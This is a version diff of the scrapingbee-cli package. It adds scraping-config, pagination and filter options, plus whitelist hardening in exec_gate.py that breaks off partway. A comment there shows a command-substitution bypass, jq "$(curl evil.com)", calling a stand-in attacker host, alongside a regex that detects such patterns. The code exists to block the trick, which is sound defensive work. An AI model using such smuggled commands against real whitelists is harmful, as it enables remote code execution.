scrapingbee-cli 1.3.0__tar.gz → 1.3.1__tar.gz
- {scrapingbee_cli-1.3.0/src/scrapingbee_cli.egg-info → scrapingbee_cli-1.3.1}/PKG-INFO +5 -2
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/README.md +4 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/pyproject.toml +1 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/__init__.py +1 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli_utils.py +19 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/client.py +8 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/amazon.py +2 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/crawl.py +10 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/google.py +2 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/scrape.py +8 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/walmart.py +19 -3
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/youtube.py +9 -4
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/exec_gate.py +50 -5
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1/src/scrapingbee_cli.egg-info}/PKG-INFO +5 -2
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/LICENSE +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/setup.cfg +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/audit.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/batch.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/__init__.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/auth.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/chatgpt.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/export.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/fast_search.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/schedule.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/unsafe.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/usage.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/config.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/crawl.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/credits.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/SOURCES.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/dependency_links.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/entry_points.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/requires.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/top_level.txt +0 -0
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: scrapingbee-cli
|
|
3
|
-
Version: 1.3.
|
|
3
|
+
Version: 1.3.1
|
|
4
4
|
Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
|
|
5
5
|
Author: ScrapingBee
|
|
6
6
|
License-Expression: MIT
|
|
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
|
|
|
81
81
|
- **`scrapingbee --help`** – List all commands.
|
|
82
82
|
- **`scrapingbee [command] --help`** – Options and parameters for that command.
|
|
83
83
|
|
|
84
|
-
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
84
|
+
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
85
|
+
|
|
86
|
+
**Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
|
|
85
87
|
|
|
86
88
|
### Commands
|
|
87
89
|
|
|
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
|
|
|
117
119
|
- **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
|
|
118
120
|
- **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
|
|
119
121
|
- **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
|
|
122
|
+
- **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
|
|
120
123
|
|
|
121
124
|
### Examples
|
|
122
125
|
|
|
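The precedence rule stated for `--scraping-config` (inline options override saved settings) can be illustrated with a small sketch. The helper name `effective_options` and the example values are hypothetical; the diff only shows the CLI forwarding a `scraping_config` parameter, so where the merge actually happens is not visible here.

```python
from typing import Any


def effective_options(saved: dict[str, Any], inline: dict[str, Any]) -> dict[str, Any]:
    """Overlay inline options on a saved configuration (hypothetical helper).

    Options left unset on the command line (None) do not mask saved values.
    """
    merged = dict(saved)
    merged.update({k: v for k, v in inline.items() if v is not None})
    return merged


saved_config = {"render_js": "true", "device": "desktop"}  # illustrative values
inline_flags = {"device": "mobile", "wait": None}          # wait was not passed
print(effective_options(saved_config, inline_flags))
```

Only `device` is overridden in this run; `render_js` keeps its saved value because no inline option replaced it.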
@@ -44,7 +44,9 @@ scrapingbee [command] [arguments] [options]
|
|
|
44
44
|
- **`scrapingbee --help`** – List all commands.
|
|
45
45
|
- **`scrapingbee [command] --help`** – Options and parameters for that command.
|
|
46
46
|
|
|
47
|
-
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
47
|
+
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
48
|
+
|
|
49
|
+
**Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
|
|
48
50
|
|
|
49
51
|
### Commands
|
|
50
52
|
|
|
@@ -80,6 +82,7 @@ scrapingbee [command] [arguments] [options]
|
|
|
80
82
|
- **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
|
|
81
83
|
- **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
|
|
82
84
|
- **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
|
|
85
|
+
- **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
|
|
83
86
|
|
|
84
87
|
### Examples
|
|
85
88
|
|
|
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
|
|
|
4
4
|
|
|
5
5
|
[project]
|
|
6
6
|
name = "scrapingbee-cli"
|
|
7
|
-
version = "1.3.
|
|
7
|
+
version = "1.3.1"
|
|
8
8
|
description = "Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal."
|
|
9
9
|
readme = "README.md"
|
|
10
10
|
license = "MIT"
|
|
@@ -9,6 +9,23 @@ from typing import Any
 import click
 
 
+class NormalizedChoice(click.Choice):
+    """Choice type that accepts both hyphens and underscores.
+
+    Automatically converts underscores to hyphens before validation,
+    allowing users to use either format interchangeably.
+    Example: both --sort-by price-low and --sort-by price_low work.
+    """
+
+    def convert(self, value: str, param: Any, ctx: Any) -> str:
+        """Convert underscores to hyphens before validation."""
+        if value is not None:
+            normalized = value.replace("_", "-")
+        else:
+            normalized = value
+        return super().convert(normalized, param, ctx)
+
+
 def _output_options(f: Any) -> Any:
     """Output + Retry options (for commands without batch support)."""
     f = click.option(
|
|
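The normalization that `NormalizedChoice` adds can be sketched without click. This is a dependency-free stand-in, not the class from the diff: `normalize_choice` is a hypothetical name, and the case-insensitive comparison is an assumption that mirrors the `case_sensitive=False` argument used where the class is applied.

```python
def normalize_choice(value: str, choices: list[str]) -> str:
    """Return the canonical choice matching value, treating '_' as '-'."""
    normalized = value.replace("_", "-").lower()
    for choice in choices:
        if choice.lower() == normalized:
            return choice
    raise ValueError(f"invalid choice {value!r}; expected one of {choices}")


# Choice list as it appears in the walmart.py hunk headers of this diff.
WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]

print(normalize_choice("price_low", WALMART_SORT_BY))
print(normalize_choice("Best-Seller", WALMART_SORT_BY))
```

Because underscores are rewritten before matching, a choice list that itself contained underscores would stop matching; the lists visible in this diff (for example `WALMART_SORT_BY`) use hyphens.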
@@ -385,6 +402,7 @@ def build_scrape_kwargs(
|
|
|
385
402
|
custom_google: str | None = None,
|
|
386
403
|
transparent_status_code: str | None = None,
|
|
387
404
|
body: str | None = None,
|
|
405
|
+
scraping_config: str | None = None,
|
|
388
406
|
) -> dict[str, Any]:
|
|
389
407
|
"""Build kwargs for Client.scrape() from scrape command options.
|
|
390
408
|
Single source of parse_bool for bool-like opts."""
|
|
@@ -424,6 +442,7 @@ def build_scrape_kwargs(
|
|
|
424
442
|
"custom_google": parse_bool(custom_google),
|
|
425
443
|
"transparent_status_code": parse_bool(transparent_status_code),
|
|
426
444
|
"body": body,
|
|
445
|
+
"scraping_config": scraping_config,
|
|
427
446
|
}
|
|
428
447
|
|
|
429
448
|
|
|
@@ -177,6 +177,7 @@ class Client:
|
|
|
177
177
|
custom_google: bool | None = None,
|
|
178
178
|
transparent_status_code: bool | None = None,
|
|
179
179
|
body: str | None = None,
|
|
180
|
+
scraping_config: str | None = None,
|
|
180
181
|
retries: int = 3,
|
|
181
182
|
backoff: float = 2.0,
|
|
182
183
|
**kwargs: Any,
|
|
@@ -217,6 +218,7 @@ class Client:
|
|
|
217
218
|
("device", device),
|
|
218
219
|
("custom_google", self._bool(custom_google)),
|
|
219
220
|
("transparent_status_code", self._bool(transparent_status_code)),
|
|
221
|
+
("scraping_config", scraping_config),
|
|
220
222
|
]:
|
|
221
223
|
if v is not None:
|
|
222
224
|
params[k] = str(v) if not isinstance(v, str) else v
|
|
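The loop in this hunk forwards an option to the API only when it was actually set, which is why adding `scraping_config` to the list is enough to pass it through. A minimal sketch of that pattern follows; `build_params` is a hypothetical helper, not a function from the package.

```python
from typing import Any


def build_params(pairs: list[tuple[str, Any]]) -> dict[str, str]:
    """Keep only options that were set, converting values to strings."""
    params: dict[str, str] = {}
    for key, value in pairs:
        if value is not None:
            params[key] = value if isinstance(value, str) else str(value)
    return params


print(build_params([("device", None), ("scraping_config", "My-Config"), ("wait", 500)]))
```

Unset options never reach the query string, so a `None` default for `scraping_config` leaves existing requests unchanged.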
@@ -415,6 +417,7 @@ class Client:
|
|
|
415
417
|
async def walmart_search(
|
|
416
418
|
self,
|
|
417
419
|
query: str,
|
|
420
|
+
start_page: int | None = None,
|
|
418
421
|
min_price: int | None = None,
|
|
419
422
|
max_price: int | None = None,
|
|
420
423
|
sort_by: str | None = None,
|
|
@@ -432,6 +435,7 @@ class Client:
|
|
|
432
435
|
) -> tuple[bytes, dict, int]:
|
|
433
436
|
params = {
|
|
434
437
|
"query": query,
|
|
438
|
+
"start_page": start_page if start_page is not None else None,
|
|
435
439
|
"min_price": min_price if min_price is not None else None,
|
|
436
440
|
"max_price": max_price if max_price is not None else None,
|
|
437
441
|
"sort_by": sort_by,
|
|
@@ -455,6 +459,7 @@ class Client:
|
|
|
455
459
|
async def walmart_product(
|
|
456
460
|
self,
|
|
457
461
|
product_id: str,
|
|
462
|
+
device: str | None = None,
|
|
458
463
|
domain: str | None = None,
|
|
459
464
|
delivery_zip: str | None = None,
|
|
460
465
|
store_id: str | None = None,
|
|
@@ -466,6 +471,7 @@ class Client:
|
|
|
466
471
|
) -> tuple[bytes, dict, int]:
|
|
467
472
|
params = {
|
|
468
473
|
"product_id": product_id,
|
|
474
|
+
"device": device,
|
|
469
475
|
"domain": domain,
|
|
470
476
|
"delivery_zip": delivery_zip,
|
|
471
477
|
"store_id": store_id,
|
|
@@ -497,6 +503,7 @@ class Client:
|
|
|
497
503
|
hdr: bool | None = None,
|
|
498
504
|
location: bool | None = None,
|
|
499
505
|
vr180: bool | None = None,
|
|
506
|
+
purchased: bool | None = None,
|
|
500
507
|
retries: int = 3,
|
|
501
508
|
backoff: float = 2.0,
|
|
502
509
|
) -> tuple[bytes, dict, int]:
|
|
@@ -516,6 +523,7 @@ class Client:
|
|
|
516
523
|
"hdr": self._bool(hdr),
|
|
517
524
|
"location": self._bool(location),
|
|
518
525
|
"vr180": self._bool(vr180),
|
|
526
|
+
"purchased": self._bool(purchased),
|
|
519
527
|
}
|
|
520
528
|
return await self._get_with_retry(
|
|
521
529
|
"/youtube/search",
|
|
@@ -17,6 +17,7 @@ from ..batch import (
|
|
|
17
17
|
)
|
|
18
18
|
from ..cli_utils import (
|
|
19
19
|
DEVICE_DESKTOP_MOBILE_TABLET,
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
21
22
|
_validate_page,
|
|
22
23
|
check_api_response,
|
|
@@ -191,7 +192,7 @@ def amazon_product_cmd(
|
|
|
191
192
|
@optgroup.option("--pages", type=int, default=None, help="Number of pages to fetch.")
|
|
192
193
|
@optgroup.option(
|
|
193
194
|
"--sort-by",
|
|
194
|
-
type=
|
|
195
|
+
type=NormalizedChoice(AMAZON_SORT_BY, case_sensitive=False),
|
|
195
196
|
default=None,
|
|
196
197
|
help="Sort order.",
|
|
197
198
|
)
|
|
@@ -59,6 +59,7 @@ def _crawl_build_params(
|
|
|
59
59
|
device: str | None,
|
|
60
60
|
custom_google: str | None,
|
|
61
61
|
transparent_status_code: str | None,
|
|
62
|
+
scraping_config: str | None = None,
|
|
62
63
|
) -> dict[str, str]:
|
|
63
64
|
"""Build ScrapingBee API params dict from crawl options (quick-crawl URL mode)."""
|
|
64
65
|
kwargs = build_scrape_kwargs(
|
|
@@ -97,6 +98,7 @@ def _crawl_build_params(
|
|
|
97
98
|
custom_google=custom_google,
|
|
98
99
|
transparent_status_code=transparent_status_code,
|
|
99
100
|
body=None,
|
|
101
|
+
scraping_config=scraping_config,
|
|
100
102
|
)
|
|
101
103
|
return scrape_kwargs_to_api_params(kwargs)
|
|
102
104
|
|
|
@@ -117,6 +119,12 @@ def _crawl_build_params(
|
|
|
117
119
|
default=None,
|
|
118
120
|
help="Path to Scrapy project. Spider mode only.",
|
|
119
121
|
)
|
|
122
|
+
@click.option(
|
|
123
|
+
"--scraping-config",
|
|
124
|
+
type=str,
|
|
125
|
+
default=None,
|
|
126
|
+
help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
|
|
127
|
+
)
|
|
120
128
|
@optgroup.group("Rendering", help="JavaScript rendering and viewport options")
|
|
121
129
|
@optgroup.option(
|
|
122
130
|
"--render-js",
|
|
@@ -323,6 +331,7 @@ def crawl_cmd(
|
|
|
323
331
|
target: tuple[str, ...],
|
|
324
332
|
from_sitemap: str | None,
|
|
325
333
|
project: str | None,
|
|
334
|
+
scraping_config: str | None,
|
|
326
335
|
render_js: str | None,
|
|
327
336
|
js_scenario: str | None,
|
|
328
337
|
wait: int | None,
|
|
@@ -467,6 +476,7 @@ def crawl_cmd(
|
|
|
467
476
|
device=device,
|
|
468
477
|
custom_google=custom_google,
|
|
469
478
|
transparent_status_code=transparent_status_code,
|
|
479
|
+
scraping_config=scraping_config,
|
|
470
480
|
)
|
|
471
481
|
except ValueError as e:
|
|
472
482
|
click.echo(str(e), err=True)
|
|
@@ -17,6 +17,7 @@ from ..batch import (
|
|
|
17
17
|
)
|
|
18
18
|
from ..cli_utils import (
|
|
19
19
|
DEVICE_DESKTOP_MOBILE,
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
21
22
|
_validate_page,
|
|
22
23
|
check_api_response,
|
|
@@ -56,7 +57,7 @@ def _warn_empty_organic(data: bytes, search_type: str | None) -> None:
|
|
|
56
57
|
@optgroup.group("Search", help="Search type, locale, and pagination")
|
|
57
58
|
@optgroup.option(
|
|
58
59
|
"--search-type",
|
|
59
|
-
type=
|
|
60
|
+
type=NormalizedChoice(
|
|
60
61
|
["classic", "news", "maps", "lens", "shopping", "images", "ai-mode"],
|
|
61
62
|
case_sensitive=False,
|
|
62
63
|
),
|
|
@@ -84,6 +84,12 @@ SCRAPE_PRESETS = (
|
|
|
84
84
|
default=None,
|
|
85
85
|
help="Apply a predefined set of options. Preset only sets options you did not set. See --help for list.",
|
|
86
86
|
)
|
|
87
|
+
@click.option(
|
|
88
|
+
"--scraping-config",
|
|
89
|
+
type=str,
|
|
90
|
+
default=None,
|
|
91
|
+
help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
|
|
92
|
+
)
|
|
87
93
|
@click.option(
|
|
88
94
|
"--force-extension",
|
|
89
95
|
type=str,
|
|
@@ -308,6 +314,7 @@ def scrape_cmd(
|
|
|
308
314
|
obj: dict,
|
|
309
315
|
url: str | None,
|
|
310
316
|
preset: str | None,
|
|
317
|
+
scraping_config: str | None,
|
|
311
318
|
force_extension: str | None,
|
|
312
319
|
render_js: str | None,
|
|
313
320
|
js_scenario: str | None,
|
|
@@ -467,6 +474,7 @@ def scrape_cmd(
|
|
|
467
474
|
custom_google=custom_google,
|
|
468
475
|
transparent_status_code=transparent_status_code,
|
|
469
476
|
body=body,
|
|
477
|
+
scraping_config=scraping_config,
|
|
470
478
|
)
|
|
471
479
|
except ValueError as e:
|
|
472
480
|
click.echo(str(e), err=True)
|
|
@@ -17,7 +17,9 @@ from ..batch import (
|
|
|
17
17
|
)
|
|
18
18
|
from ..cli_utils import (
|
|
19
19
|
DEVICE_DESKTOP_MOBILE_TABLET,
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
22
|
+
_validate_page,
|
|
21
23
|
_validate_price_range,
|
|
22
24
|
check_api_response,
|
|
23
25
|
norm_val,
|
|
@@ -34,12 +36,13 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
|
|
|
34
36
|
|
|
35
37
|
@click.command("walmart-search")
|
|
36
38
|
@click.argument("query", required=False)
|
|
37
|
-
@optgroup.group("
|
|
39
|
+
@optgroup.group("Pagination & filters", help="Pages, price, and sort")
|
|
40
|
+
@optgroup.option("--start-page", type=int, default=None, help="Starting page number.")
|
|
38
41
|
@optgroup.option("--min-price", type=int, default=None, help="Minimum price filter (integer).")
|
|
39
42
|
@optgroup.option("--max-price", type=int, default=None, help="Maximum price filter (integer).")
|
|
40
43
|
@optgroup.option(
|
|
41
44
|
"--sort-by",
|
|
42
|
-
type=
|
|
45
|
+
type=NormalizedChoice(WALMART_SORT_BY, case_sensitive=False),
|
|
43
46
|
default=None,
|
|
44
47
|
help="Sort order.",
|
|
45
48
|
)
|
|
@@ -74,6 +77,7 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
|
|
|
74
77
|
def walmart_search_cmd(
|
|
75
78
|
obj: dict,
|
|
76
79
|
query: str | None,
|
|
80
|
+
start_page: int | None,
|
|
77
81
|
min_price: int | None,
|
|
78
82
|
max_price: int | None,
|
|
79
83
|
sort_by: str | None,
|
|
@@ -96,6 +100,7 @@ def walmart_search_cmd(
|
|
|
96
100
|
except ValueError as e:
|
|
97
101
|
click.echo(str(e), err=True)
|
|
98
102
|
raise SystemExit(1)
|
|
103
|
+
_validate_page(start_page, "start_page")
|
|
99
104
|
_validate_price_range(min_price, max_price)
|
|
100
105
|
|
|
101
106
|
if input_file:
|
|
@@ -123,6 +128,7 @@ def walmart_search_cmd(
|
|
|
123
128
|
async def api_call(client, q):
|
|
124
129
|
return await client.walmart_search(
|
|
125
130
|
q,
|
|
131
|
+
start_page=start_page,
|
|
126
132
|
min_price=min_price,
|
|
127
133
|
max_price=max_price,
|
|
128
134
|
sort_by=norm_val(sort_by),
|
|
@@ -165,6 +171,7 @@ def walmart_search_cmd(
|
|
|
165
171
|
async with Client(key, BASE_URL) as client:
|
|
166
172
|
data, headers, status_code = await client.walmart_search(
|
|
167
173
|
query,
|
|
174
|
+
start_page=start_page,
|
|
168
175
|
min_price=min_price,
|
|
169
176
|
max_price=max_price,
|
|
170
177
|
sort_by=norm_val(sort_by),
|
|
@@ -200,7 +207,13 @@ def walmart_search_cmd(
|
|
|
200
207
|
|
|
201
208
|
@click.command("walmart-product")
|
|
202
209
|
@click.argument("product_id", required=False)
|
|
203
|
-
@optgroup.group("
|
|
210
|
+
@optgroup.group("Device & locale", help="Device, domain, and delivery location")
|
|
211
|
+
@optgroup.option(
|
|
212
|
+
"--device",
|
|
213
|
+
type=click.Choice(DEVICE_DESKTOP_MOBILE_TABLET, case_sensitive=False),
|
|
214
|
+
default=None,
|
|
215
|
+
help="Device: desktop, mobile, or tablet.",
|
|
216
|
+
)
|
|
204
217
|
@optgroup.option("--domain", type=str, default=None, help="Walmart domain.")
|
|
205
218
|
@optgroup.option("--delivery-zip", type=str, default=None, help="Delivery ZIP code.")
|
|
206
219
|
@optgroup.option("--store-id", type=str, default=None, help="Walmart store ID.")
|
|
@@ -213,6 +226,7 @@ def walmart_search_cmd(
|
|
|
213
226
|
def walmart_product_cmd(
|
|
214
227
|
obj: dict,
|
|
215
228
|
product_id: str | None,
|
|
229
|
+
device: str | None,
|
|
216
230
|
domain: str | None,
|
|
217
231
|
delivery_zip: str | None,
|
|
218
232
|
store_id: str | None,
|
|
@@ -255,6 +269,7 @@ def walmart_product_cmd(
|
|
|
255
269
|
async def api_call(client, pid):
|
|
256
270
|
return await client.walmart_product(
|
|
257
271
|
pid,
|
|
272
|
+
device=device,
|
|
258
273
|
domain=domain,
|
|
259
274
|
delivery_zip=delivery_zip,
|
|
260
275
|
store_id=store_id,
|
|
@@ -291,6 +306,7 @@ def walmart_product_cmd(
|
|
|
291
306
|
async with Client(key, BASE_URL) as client:
|
|
292
307
|
data, headers, status_code = await client.walmart_product(
|
|
293
308
|
product_id,
|
|
309
|
+
device=device,
|
|
294
310
|
domain=domain,
|
|
295
311
|
delivery_zip=delivery_zip,
|
|
296
312
|
store_id=store_id,
|
|
@@ -17,6 +17,7 @@ from ..batch import (
|
|
|
17
17
|
validate_batch_run,
|
|
18
18
|
)
|
|
19
19
|
from ..cli_utils import (
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
21
22
|
check_api_response,
|
|
22
23
|
norm_val,
|
|
@@ -117,26 +118,26 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
|
|
|
117
118
|
@optgroup.group("Filters", help="Upload date, type, duration, sort")
|
|
118
119
|
@optgroup.option(
|
|
119
120
|
"--upload-date",
|
|
120
|
-
type=
|
|
121
|
+
type=NormalizedChoice(YOUTUBE_UPLOAD_DATE, case_sensitive=False),
|
|
121
122
|
default=None,
|
|
122
123
|
help="Filter by upload date.",
|
|
123
124
|
)
|
|
124
125
|
@optgroup.option(
|
|
125
126
|
"--type",
|
|
126
127
|
"type_",
|
|
127
|
-
type=
|
|
128
|
+
type=NormalizedChoice(YOUTUBE_TYPE, case_sensitive=False),
|
|
128
129
|
default=None,
|
|
129
130
|
help="Result type.",
|
|
130
131
|
)
|
|
131
132
|
@optgroup.option(
|
|
132
133
|
"--duration",
|
|
133
|
-
type=
|
|
134
|
+
type=NormalizedChoice(YOUTUBE_DURATION, case_sensitive=False),
|
|
134
135
|
default=None,
|
|
135
136
|
help="Duration: short (<4 min), medium (4-20 min), long (>20 min).",
|
|
136
137
|
)
|
|
137
138
|
@optgroup.option(
|
|
138
139
|
"--sort-by",
|
|
139
|
-
type=
|
|
140
|
+
type=NormalizedChoice(YOUTUBE_SORT_BY, case_sensitive=False),
|
|
140
141
|
default=None,
|
|
141
142
|
help="Sort order.",
|
|
142
143
|
)
|
|
@@ -153,6 +154,7 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
|
|
|
153
154
|
@optgroup.option("--hdr", type=str, default=None, help="HDR videos only (true/false).")
|
|
154
155
|
@optgroup.option("--location", type=str, default=None, help="With location (true/false).")
|
|
155
156
|
@optgroup.option("--vr180", type=str, default=None, help="VR180 only (true/false).")
|
|
157
|
+
@optgroup.option("--purchased", type=str, default=None, help="Purchased only (true/false).")
|
|
156
158
|
@_batch_options
|
|
157
159
|
@click.pass_obj
|
|
158
160
|
def youtube_search_cmd(
|
|
@@ -172,6 +174,7 @@ def youtube_search_cmd(
|
|
|
172
174
|
hdr: str | None,
|
|
173
175
|
location: str | None,
|
|
174
176
|
vr180: str | None,
|
|
177
|
+
purchased: str | None,
|
|
175
178
|
**kwargs,
|
|
176
179
|
) -> None:
|
|
177
180
|
"""Search YouTube videos."""
|
|
@@ -223,6 +226,7 @@ def youtube_search_cmd(
|
|
|
223
226
|
hdr=parse_bool(hdr),
|
|
224
227
|
location=parse_bool(location),
|
|
225
228
|
vr180=parse_bool(vr180),
|
|
229
|
+
purchased=parse_bool(purchased),
|
|
226
230
|
retries=obj.get("retries", 3) or 3,
|
|
227
231
|
backoff=obj.get("backoff", 2.0) or 2.0,
|
|
228
232
|
)
|
|
@@ -268,6 +272,7 @@ def youtube_search_cmd(
|
|
|
268
272
|
hdr=parse_bool(hdr),
|
|
269
273
|
location=parse_bool(location),
|
|
270
274
|
vr180=parse_bool(vr180),
|
|
275
|
+
purchased=parse_bool(purchased),
|
|
271
276
|
retries=obj.get("retries", 3) or 3,
|
|
272
277
|
backoff=obj.get("backoff", 2.0) or 2.0,
|
|
273
278
|
)
|
|
@@ -10,6 +10,7 @@ All three features are disabled by default. To enable, ALL of these must be true
 from __future__ import annotations
 
 import os
+import re
 
 import click
 
@@ -59,20 +60,64 @@ def get_whitelist() -> list[str]:
     return [cmd.strip() for cmd in raw.split(",") if cmd.strip()]
 
 
-
-
-
+# Patterns that bypass whitelist validation by executing commands
+# inside what looks like a single whitelisted command.
+# Example: jq "$(curl evil.com)" — one segment starting with "jq",
+# but $() executes curl before jq even runs.
+_SUBSTITUTION_PATTERNS = re.compile(
+    r"\$\(" # command substitution $(...)
+    r"|`" # backtick command substitution
+    r"|\$\{" # variable expansion ${...} (can embed commands)
+    r"|<\(" # process substitution <(...)
+    r"|>\(" # process substitution >(...)
+)
+
+
+def _split_shell_segments(cmd: str) -> list[str]:
+    """Split a shell command on pipe and chaining operators.
+
+    Returns the individual command segments from a chain like:
+    'jq .title | head -1 && echo done' → ['jq .title', 'head -1', 'echo done']
+    """
+    # Split on ||, &&, |, ;, &, and newlines — longest operators first
+    parts = re.split(r"\|\||&&|[|;&\n]", cmd)
+    return [p.strip() for p in parts if p.strip()]
+
+
